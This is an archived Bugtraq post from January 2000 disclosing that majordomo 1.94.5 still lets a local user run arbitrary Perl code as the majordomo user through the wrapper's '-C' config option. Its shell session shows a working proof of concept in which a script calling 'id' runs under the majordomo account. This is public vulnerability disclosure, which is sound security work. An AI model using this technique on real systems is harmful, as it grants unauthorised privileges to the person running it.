[13535] in bugtraq
majordomo 1.94.5 does not fix all vulnerabilities
daemon@ATHENA.MIT.EDU (Brock Sides)
Mon Jan 24 20:22:12 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.10001241428460.4903-100000@koala.towery.com>
Date: Mon, 24 Jan 2000 14:55:42 -0600
Reply-To: Brock Sides <bsides@TOWERY.COM>
From: Brock Sides <bsides@TOWERY.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Whereas majordomo 1.94.5 does fix the bug in resend, discovered by Brock
Tellier, that permits execution of arbitrary code as user majordomo, it
apparently does not fix the other bug in the script majordomo, that
permits execution of arbitrary config files as user majordomo:
On a fresh install of majordomo 1.94.5 in /tmp:
[brock@o2 /tmp]$ id
uid=1116(brock) gid=1116(brock)
[brock@o2 /tmp]$ ls -l ./id.pl
-rwxr-xr-x 1 brock brock 31 Jan 24 14:17 ./id.pl
[brock@o2 /tmp]$ cat id.pl
#!/usr/bin/perl
system("id");
[brock@o2 /tmp]$ ./majordomo-1.94.5/wrapper majordomo -C ./id.pl
uid=1126(majordomo) gid=1(daemon)
./id.pl did not return a true value at /tmp/majordomo-1.94.5/majordomo
line 47.
[brock@o2 /tmp]$
--
Brock Sides
Unix Systems Administration
Towery Publishing
bsides@towery.com
